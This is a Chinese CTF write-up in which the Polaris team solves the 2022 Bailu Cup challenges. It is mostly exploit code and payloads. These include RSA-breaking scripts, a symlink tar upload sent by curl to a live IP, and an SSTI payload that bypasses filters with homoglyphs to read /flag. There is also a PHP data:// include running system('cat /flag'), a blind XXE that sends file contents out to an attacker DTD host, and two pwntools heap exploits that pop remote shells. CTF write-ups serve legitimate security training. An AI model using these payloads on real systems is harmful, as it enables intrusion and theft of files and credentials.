Polaris北极星战队本次排名第5,共解出9道题
-
问题描述的密文你会解密吗?:
-
Can you help us decrypt this text?:
-
Anti-Fermat?:
-
Unzip
-
ezPython
-
babyinclude
-
upload
-
note1
-
note2
MISC
-
问题描述的密文你会解密吗?:
-
Ak_TZh+&:.]v)W.*@DSiR5W#fR,q2G+<,]vin4QXX}?<UrJw;aG3^u[|m'AxJ@?Y1ksf0;mN
题解:base 92 + base 64
Crypto
-
Can you help us decrypt this text?:
-
4d7a637a5a444d794d7a6730597a63344d6a51334e4463794e574d7a5a5463774d6a63304f5452694
d6a457a4d44597a4e7a417a4e5449324e445579596a59324d324d304d5451304d7a4133597a4d334d
7a51324d6a5a6d4e3251324e4451784d3259794e4463334e4455324f4449794e4755253344
题解:16进制转ASCII → URL解码(末尾的 %3D 即 "=")→ base64 解码 → 16进制转ASCII → ROT47
-
Anti-Fermat?:
-
import gmpy2
from Crypto.Util.number import *
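import math

# The published listing wrapped these literals across several lines, which is
# not valid Python; they are reassembled here from the exact hex shown.
n = int(
    "31e22a7a2c5ec946692357dc51014a80530afeb46f419831fcbd896aa1d5cee2d0c69123b301706"
    "7afdb3d82b2be3535aebdf11da0fa2b4873233bae6af8a1c2a9344b6f64ade1c6c48a2828130c3520"
    "53e1729b850774589e8947c8c0a472a8dc90caa542da5cec7f5fa7581747dcb558300437c30b016f7"
    "69d4a85af8584f311dfb2f9e87fa7d16eaccb0303ecba491619ec7dda72e4037d96c607e666eced58"
    "2d6eb2c232689fce1c08a54b80cf6d39ef1f2b467d970998c6d54d1779979c89a3b301cd1435bde87"
    "87d1141c912cf32b56610fba9205c6e86fefc490c8b2e06f5ed9f775f5b0fe945fa9fca3fc217b4c9"
    "dcd4b26676f576d0273b79417b81",
    16,
)
c = int(
    "118dd8ab5df8685c5db5b1242896df41e8e9016f5f16276b6d311b29f0e5f9315530574b51c6e7c"
    "82d0c88ab92787d639443b921a452c850db580256ccfd55ee52ea9732821525da1d21351acb230a79"
    "9ecaa1802c6f24487176c9cae537c3188e083552a84a2aebdd55c4014b41846768d7608970c1e52d9"
    "a68e550ef8bb6016adb6f8e0672e1c8198a5442799a5b8142e8d0fadb6e6146a062ef906bd58c46f3"
    "1bf65263b6142b1976773289dee408ae233b6c0c534dd5092bd7f331c3457971278d335923edc044b"
    "a88852680ee39d1cc84a66dc81b70039e2435892b11f310b490c872448f7a8dc718759b2052b0911f"
    "758102a59c54dea061a8a3ff6879",
    16,
)
e = 65537


def recover_factor(n, s):
    """Return the larger root of x**2 - s*x + n = 0.

    If p + q == s exactly this is the larger prime factor of n = p*q.
    'Anti-Fermat' keys keep |p - q| large to defeat Fermat factoring, but
    the solver evidently relies on p + q being pinned near 2**1024 (see the
    ``1 << 1024`` below), which makes this quadratic recover the factors.
    When s is only an approximation the result is an estimate that the
    caller refines with a prime search.

    Args:
        n: RSA modulus.
        s: assumed value of p + q.
    Returns:
        (s + isqrt(s*s - 4*n)) // 2 as an int.
    Raises:
        ValueError: if s*s < 4*n, i.e. s cannot be the sum of two factors
            of n (no real root).
    """
    disc = s * s - 4 * n
    if disc < 0:
        raise ValueError("s is smaller than any possible p + q")
    return (s + math.isqrt(disc)) // 2


def rsa_decrypt(c, p, q, e):
    """Decrypt textbook RSA ciphertext ``c`` given the prime factors of n.

    Returns the plaintext as big-endian bytes, matching
    Crypto.Util.number.long_to_bytes (0 -> b'\\x00').  Uses the stdlib
    modular inverse ``pow(e, -1, phi)`` (Python 3.8+) instead of gmpy2.
    """
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)
    m = pow(c, d, p * q)
    return m.to_bytes(max(1, (m.bit_length() + 7) // 8), "big")


if __name__ == "__main__":
    # Start from the root of x**2 - 2**1024*x + n and walk forward to the
    # first prime that actually divides n (gmpy2 is only needed for this).
    p = recover_factor(n, 1 << 1024)
    while n % p != 0:
        p = int(gmpy2.next_prime(p))
    q = n // p
    print(rsa_decrypt(c, p, q, e))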
-
WEB
-
Unzip
原题参考:https://blog.huli.tw/2022/06/14/justctf-2022-writeup/
-
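# Symlink-in-archive trick (see the JustCTF 2022 writeup referenced above):
# ./flag.txt is a symlink to ../../../flag.txt, so extracting the tar on the
# server plants a link that escapes the extraction directory.
ln -fs ../../../flag.txt .
# a.zip is just a placeholder archive; the zip flags are reproduced as published.
touch a
zip a.zip -xi a
# --owner 0 --group 0 record uid/gid 0 in the tar headers (presumably what the
# extractor expects).  The published listing shows en dashes ("–owner"); GNU tar
# only accepts the ASCII "--" form.
tar --owner 0 --group 0 -cvf payload.tar flag.txt a.zip
# Upload the archive as a multipart form field.  The field name was mangled to
# "[email protected]" by e-mail obfuscation in the published page; "file=@payload.tar"
# is the conventional shape -- confirm the field name against the upload form.
curl -v http://39.101.72.210:15294/extract -F 'file=@payload.tar'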
flag{ISEC-d58e25c04fa57421c6dcea179a82e63a} -
ezPython
RSA 公钥指数 e=3 且明文很短,m^3 只比 n 大很少几倍(甚至小于 n),可以用脚本对 c+k·n 逐个开立方求得 m
-
import gmpy2
import binascii
import libnum
import time
from Crypto.Util.number import long_to_bytes
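# The published listing wrapped these decimal literals across lines; they are
# reassembled here from the exact digits shown.
n = int(
    "1851478021262580642928595377560904779895545412675798287739504119938273465008146"
    "344499104457112003949823573169498346585187920428068257464253459159692301437090469"
    "745971517442987726391626060256657274104766830088549554075741473960419307115916281"
    "189769452661497378527933131975454067780057183810519746546508528541298070447527449"
    # The listing ends this literal with a stray '>' -- n may be truncated here.
    # Verify against the challenge's public key before relying on it.
    "58017956968265805370399"
)
e = 3
c = int(
    "2457069489835781252073815422504964988160135660567467845177503131292606415319587"
    "537967675850199183490864186237837358701137589617680705086633337350225534260979770"
    "49927"
)


def iroot(x, k):
    """Return floor(x ** (1/k)) for a non-negative int x and k >= 1.

    Stdlib-only replacement for gmpy2.iroot(x, k)[0].  Starts from a power
    of two that is >= the true root, so the integer Newton steps decrease
    monotonically and the first non-decreasing step is the floor root.

    Raises:
        ValueError: if x is negative.
    """
    if x < 0:
        raise ValueError("x must be non-negative")
    if x < 2:
        return x
    r = 1 << ((x.bit_length() + k - 1) // k)
    while True:
        nxt = ((k - 1) * r + x // pow(r, k - 1)) // k
        if nxt >= r:
            return r
        r = nxt


def cube_root_attack(c, n, e=3, max_k=200000000):
    """Low-public-exponent RSA attack: find k such that c + k*n is an exact e-th power.

    Works when m**e is only a small multiple of n (few modular wraps), so
    the plaintext is the e-th root of c + k*n for a small k.

    Args:
        c: ciphertext.
        n: modulus.
        e: public exponent (the challenge used 3).
        max_k: number of wraps to try (the original script used 200000000).
    Returns:
        The plaintext integer m, or None if no k in range(max_k) works
        (the original script simply printed nothing in that case).
    """
    for k in range(max_k):
        x = c + k * n
        root = iroot(x, e)
        if root ** e == x:
            return root
    return None


if __name__ == "__main__":
    res = cube_root_attack(c, n, e)
    if res is not None:
        # Equivalent of Crypto.Util.number.long_to_bytes(res).
        print(res.to_bytes(max(1, (res.bit_length() + 7) // 8), "big"))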
解得用户名和密码:
admin
Admin@!123#T1wsc14e!-mW
登录进去后对文本框 fuzz,得知过滤了 []{}_'"
可以用 Unicode 同形字符绕过(原文此处 `__globals_ _` 为排版断行,应为 `__globals__`):﹛﹛().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()﹜﹜
flag{ISEC-4a167c1cfed53e21c9e82e5e35576f56} -
babyinclude
-
然后访问 `0.php?file=data://,&content=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgL2ZsYWciKTs/Pg==`(base64 解码为 `<?php system("cat /flag");?>`)。原文写作 `textplain`,缺少斜杠:PHP 的 data:// 封装器要求带 `;base64` 参数的媒体类型形如 type/subtype,否则报 "illegal media type",应为 `text/plain`。 -
upload
扫目录发现 index.php,可以看到是 XXE 注入且无回显;思路是 XXE 盲注,通过外带(OOB)数据通道提取数据
payload: -
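<?xml version="1.0"?>
<!DOCTYPE test [
<!-- %file reads /flag through php://filter with base64 encoding, so the
     flag's bytes can be carried inside a URL in the step below. -->
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!-- %hack fetches the attacker-hosted DTD.  The listing calls it 123.dtd
     here but test.dtd further down; the two names must agree. -->
<!ENTITY % hack SYSTEM "http://ip/123.dtd">
%hack;
<!-- %dtd (declared by the external DTD) expands to the declaration of %xxe;
     %xxe; then makes the out-of-band request carrying the base64 flag. -->
%dtd;
%xxe;
]>
<!-- The published payload stopped before the closing "]>"; a root element is
     needed for a well-formed document.  Its name is irrelevant to the OOB
     channel -- use whatever the application expects. -->
<test>xxe</test>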
test.dtd
-
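<!-- External DTD (host as the file the payload's %hack entity fetches).
     Parameter-entity references inside an entity value, such as %file; here,
     are only legal in an external DTD (XML 1.0 WFC "PEs in Internal Subset"),
     which is why this declaration cannot live in the payload itself.
     Inside an entity value a bare "%" must begin a PE reference, so the
     nested "%" that declares xxe is written as the character reference
     &#x25;.  The published listing shows a literal "% xxe", most likely the
     HTML rendering of &#x25;. -->
<!ENTITY % dtd "<!ENTITY &#x25; xxe SYSTEM 'http://ip:3333/%file;'> ">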
服务器监听就有flag的base64
(没有环境了,截图不了)PWN
-
note1
-
#!/usr/bin/python3
# -*- coding:utf-8 -*-
from pwn import *
import os, struct, random, time, sys, signal
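class Shell:
    """pwntools tube wrapper plus the note1 menu helpers.

    The recv helpers raise EOFError on a short read or missing delimiter
    instead of returning a truncated buffer, so a stage that misses its
    prompt fails loudly rather than desynchronising the later stages.
    (The published listing had several of these methods collapsed onto
    single lines; the logic here is unchanged.)
    """

    def __init__(self):
        self.clear(arch='amd64', os='linux', log_level='debug')
        # self.pipe = process(['./note1'])
        self.pipe = remote('39.101.72.210', 12031)

    # --- raw tube passthroughs -------------------------------------------
    def send(self, data: bytes, **params):
        return self.pipe.send(data, **params)

    def sendline(self, data: bytes, **params):
        return self.pipe.sendline(data, **params)

    def recv(self, **params):
        return self.pipe.recv(**params)

    def close(self, **params):
        return self.pipe.close(**params)

    def recvrepeat(self, timeout, **params):
        return self.pipe.recvrepeat(timeout, **params)

    def interactive(self, **params):
        return self.pipe.interactive(**params)

    def clear(self, **params):
        return context.clear(**params)

    # --- checked receives -------------------------------------------------
    def recvn(self, numb, **params):
        """Read exactly ``numb`` bytes; raise EOFError on a short read."""
        result = self.pipe.recvn(numb, **params)
        if len(result) != numb:
            raise EOFError('recvn')
        return result

    def recvuntil(self, delims, **params):
        """Read through ``delims`` and return the bytes before it.

        Raises EOFError if the tube closed before the delimiter arrived.
        """
        result = self.pipe.recvuntil(delims, drop=False, **params)
        if not result.endswith(delims):
            raise EOFError('recvuntil')
        return result[:-len(delims)]

    def sendafter(self, delim, data, **params):
        self.recvuntil(delim, **params)
        self.send(data, **params)

    def sendlineafter(self, delim, data, **params):
        self.recvuntil(delim, **params)
        self.sendline(data, **params)

    # --- note1 menu -------------------------------------------------------
    def add(self, id, length, content, tag, func):
        """Menu 1: create note ``id`` with a ``length``-byte name buffer, a tag and a func index."""
        self.sendlineafter(b'> ', b'1')
        self.sendlineafter(b'id: ', str(id).encode())
        self.sendlineafter(b'name_length: ', str(length).encode())
        self.sendlineafter(b'name: ', content)
        self.sendlineafter(b'tag: ', tag)
        self.sendlineafter(b'func: ', str(func).encode())

    def edit_tag(self, id, tag):
        """Menu 2 / sub-menu 2: overwrite the tag of note ``id``."""
        self.sendlineafter(b'> ', b'2')
        self.sendlineafter(b'id: ', str(id).encode())
        self.sendlineafter(b'> ', b'2')
        self.sendlineafter(b'tag: ', tag)

    def edit_func(self, id, func):
        """Menu 2 / sub-menu 3: change the func index of note ``id``."""
        self.sendlineafter(b'> ', b'2')
        self.sendlineafter(b'id: ', str(id).encode())
        self.sendlineafter(b'> ', b'3')
        self.sendlineafter(b'func: ', str(func).encode())

    def edit_buf(self, id, length, content):
        """Menu 2 / sub-menu 1: resize the name buffer of note ``id`` to ``length`` and refill it."""
        self.sendlineafter(b'> ', b'2')
        self.sendlineafter(b'id: ', str(id).encode())
        self.sendlineafter(b'> ', b'1')
        self.sendlineafter(b'name_length: ', str(length).encode())
        self.sendlineafter(b'name: ', content)

    def func(self, id):
        """Menu 3: invoke the func of note ``id``."""
        self.sendlineafter(b'> ', b'3')
        self.sendlineafter(b'id: ', str(id).encode())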
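sh = Shell()

# Stage 1: leak the PIE base.  Note 0 gets a 0x500-byte name buffer, its tag
# is set to 8 'a' bytes so the func-1 output can be anchored on them, and the
# 6 bytes that follow are read as a code pointer at image offset 0x131b.
sh.add(0, 0x500, b'b' * 0x100, b'', 1)
sh.edit_tag(0, b'a' * 8)
sh.edit_func(0, 1)
sh.func(0)
sh.recvuntil(b'a' * 8)
# Pad the 6 leaked bytes with NUL.  The published listing shows b' ' here,
# which would put 0x2020 into the top two bytes and break every address
# derived from the leak; only NUL padding yields a usable pointer.
image_base = u64(sh.recvn(6).ljust(8, b'\x00')) - 0x131b
success('image_base: ' + hex(image_base))

# Stage 2: shrink note 0 to 0x17 bytes, allocate note 1 right behind it, then
# grow note 0 back to 0x101 bytes so its write overlaps note 1's record:
# 0x20 filler, a zero qword, then the two pointers note 1's func() uses.
# 0x131b / 0x3FA8 / 0x61c90 / 0x52290 are binary- and libc-specific offsets
# from the challenge files and cannot be recovered from this listing.
sh.edit_buf(0, 0x17, b'')
sh.add(1, 0x17, b'', b'', 1)
sh.edit_buf(0, 0x101, b'b' * 0x20 + p64(0) + p64(image_base + 0x131b) + p64(image_base + 0x3FA8))
sh.func(1)
sh.recvuntil(b'name: ')
libc_addr = u64(sh.recvn(6).ljust(8, b'\x00')) - 0x61c90
success('libc_addr: ' + hex(libc_addr))

# Stage 3: same overlap, now placing the "/bin/sh " string in the zero-qword
# slot and a libc address in the pointer slot, then trigger it.  The trailing
# space in the string is reproduced as published; it may originally have been
# a NUL that was lost in rendering, as with the padding bytes above.
sh.edit_buf(0, 0x101, b'b' * 0x20 + b'/bin/sh ' + p64(libc_addr + 0x52290))
sh.func(1)
sh.interactive()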
-
-
note2
-
#!/usr/bin/python3
# -*- coding:utf-8 -*-
from pwn import *
import os, struct, random, time, sys, signal
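class Shell:
    """pwntools tube wrapper plus the note2 menu (add / delete / show).

    The menu helpers go through ``self``; the published listing called the
    module-level ``sh`` instance from inside the class, which only works for
    that one instance and raises NameError when the class is used on its own.
    The recv helpers raise EOFError on short reads rather than returning a
    truncated buffer.
    """

    def __init__(self):
        self.clear(arch='amd64', os='linux', log_level='debug')
        # self.pipe = process(['./note2'])
        self.pipe = remote('39.101.72.210', 12032)

    # --- raw tube passthroughs -------------------------------------------
    def send(self, data: bytes, **params):
        return self.pipe.send(data, **params)

    def sendline(self, data: bytes, **params):
        return self.pipe.sendline(data, **params)

    def recv(self, **params):
        return self.pipe.recv(**params)

    def close(self, **params):
        return self.pipe.close(**params)

    def recvrepeat(self, timeout, **params):
        return self.pipe.recvrepeat(timeout, **params)

    def interactive(self, **params):
        return self.pipe.interactive(**params)

    def clear(self, **params):
        return context.clear(**params)

    # --- checked receives -------------------------------------------------
    def recvn(self, numb, **params):
        """Read exactly ``numb`` bytes; raise EOFError on a short read."""
        result = self.pipe.recvn(numb, **params)
        if len(result) != numb:
            raise EOFError('recvn')
        return result

    def recvuntil(self, delims, **params):
        """Read through ``delims`` and return the bytes before it.

        Raises EOFError if the tube closed before the delimiter arrived.
        """
        result = self.pipe.recvuntil(delims, drop=False, **params)
        if not result.endswith(delims):
            raise EOFError('recvuntil')
        return result[:-len(delims)]

    def sendafter(self, delim, data, **params):
        self.recvuntil(delim, **params)
        self.send(data, **params)

    def sendlineafter(self, delim, data, **params):
        self.recvuntil(delim, **params)
        self.sendline(data, **params)

    # --- note2 menu -------------------------------------------------------
    def add(self, index, size, content):
        """Menu 1: allocate ``size`` bytes in slot ``index`` and fill it with ``content``."""
        self.sendlineafter(b'> ', b'1')
        self.sendlineafter(b'Index?', str(index).encode())
        self.sendlineafter(b'Size?', str(size).encode())
        self.sendlineafter(b'content: ', content)

    def delete(self, index):
        """Menu 2: free slot ``index``.

        The slot is presumably not cleared on free: the exploit below
        show()s and re-delete()s slots it has already freed.
        """
        self.sendlineafter(b'> ', b'2')
        self.sendlineafter(b'Index?', str(index).encode())

    def show(self, index):
        """Menu 3: print the contents of slot ``index``."""
        self.sendlineafter(b'> ', b'3')
        self.sendlineafter(b'Index?', str(index).encode())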
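sh = Shell()

# Stage 1: heap leak.  Free one 0x20 chunk and read it back: with glibc
# safe-linking the fd of a lone tcache entry is (addr >> 12), so the 5 leaked
# bytes shifted back up by 12 bits give the heap base.  Pad with NUL -- the
# published listing shows b' ', which would corrupt the high bytes.
sh.add(0, 0x18, b'')
sh.delete(0)
sh.show(0)
sh.recvuntil(b'> ')
heap_addr = u64(sh.recvn(5).ljust(8, b'\x00')) * 0x1000
success('heap_addr: ' + hex(heap_addr))

# Stage 2: libc leak.  Nine 0x90 chunks; freeing eight fills the tcache bin
# (7 entries) and sends the eighth to the unsorted bin, whose fd points into
# main_arena.  0x219ce0 is the libc-specific offset of that pointer.
for i in range(9):
    sh.add(i, 0x88, b'')
for i in range(8):
    sh.delete(i)
sh.show(7)
sh.recvuntil(b'> ')
libc_addr = u64(sh.recvn(6).ljust(8, b'\x00')) - 0x219ce0
success('libc_addr: ' + hex(libc_addr))

# Stage 3: tcache poisoning.  A 0x100 chunk is laid out with a fake 0x21
# size field, a 0x18 chunk is freed, slot 8 is freed again, and the 0x100
# chunk is freed and re-allocated so the overlapping write can set the fake
# chunk's fd.  The fd is mangled with (heap_addr >> 12) to satisfy
# safe-linking and points at libc_addr + offset.
sh.delete(8)
sh.add(0, 0x100, b'a' * 0x80 + p64(0) + p64(0x21))
sh.add(1, 0x18, b'')
sh.delete(1)
sh.delete(8)
sh.delete(0)
# offset = 0x26b2e0  (alternative libc build).  The published listing fused
# this comment with the live assignment on one line, leaving `offset`
# undefined at runtime.
offset = 0x2652e0
success('offset: ' + hex(offset))
sh.add(0, 0x100, b'a' * 0x80 + p64(0) + p64(0x21) + p64((heap_addr >> 12) ^ (libc_addr + offset)))
# The next 0x18 allocation returns the poisoned libc address; 0xebcf1 and the
# heap delta below are libc/binary-specific values from the challenge files.
sh.add(1, 0x18, p64(libc_addr + 0xebcf1))
sh.add(2, 0x18, p64(heap_addr + 0x740 - 0x3d78))
sh.sendlineafter(b'> ', b'4')
sh.interactive()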
-
原文始发于微信公众号(星盟安全):2022柏鹭杯WP–Polaris战队